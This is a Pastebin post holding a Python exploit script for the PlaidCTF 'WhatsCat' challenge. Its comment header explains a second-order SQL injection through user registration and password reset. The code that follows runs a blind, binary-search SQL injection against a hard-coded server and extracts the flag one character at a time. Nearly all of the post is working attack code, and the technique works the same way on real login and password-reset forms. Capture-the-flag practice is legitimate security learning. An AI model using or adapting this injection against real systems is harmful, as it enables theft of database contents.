daily pastebin goal
42%
SHARE
TWEET

PPP's WhatsCat Challenge Exploit by @ngocdh

huyngoc Apr 13th, 2014 854 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #PPP's WhatsCat Challenge Exploit by @ngocdh
  2. #http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
  3. #
  4. #Step 1 : Register with username "hn"
  5. #Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
  6. #Step 3 : Reset password of the 2nd user
  7. #Step 4 : Log in with username hn and original password. If password is invalid then the condition is true (21 = length(flag))
  8. #
  9. #The flag table/column and length were found manually
  10. #This code extracts only the flag
  11.  
  12. import urllib2
  13. import string
  14. import random
  15.  
  16. def idgen(size=6, chars=string.ascii_uppercase + string.digits):
  17.   return ''.join(random.choice(chars) for _ in range(size))
  18.  
  19. def check(pos,d,u):
  20.   id = idgen() + "hn"
  21.  
  22.   query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"
  23.  
  24.   url = "http://54.196.116.77/index.php?page=login"
  25.  
  26.   data_reg = "name="+id+"&pass=hn&email=hn&register=Register"
  27.   data_reg2 = "name="+query+"&pass=hn&email=hn&register=Register"
  28.   data_reset = "name="+query+"&reset=Forgot+Password&pass=&email="
  29.   data_login = "name="+id+"&pass=hn&login=Login&email="
  30.  
  31.   a=urllib2.urlopen(url,data_reg).read()
  32.   a=urllib2.urlopen(url,data_reg2).read()
  33.   b=urllib2.urlopen(url,data_reset).read()
  34.   c=urllib2.urlopen(url,data_login).read()
  35.  
  36.   if c.find("Welcome back")>0 and c.find("invalid")<0:
  37.     return 0
  38.   else:
  39.     return 1
  40.  
  41. res = ""
  42. for i in range(1,22):
  43.   p=0
  44.   q=255
  45.   for x in range(0,8):
  46.     n = (p+q)/2
  47.     temp = check(str(i),str(p),str(n))
  48.     q = n if temp==1 else q
  49.     p = n+1 if temp==0 else p
  50.   res = res + chr(p)
  51.   print res
RAW Paste Data
Top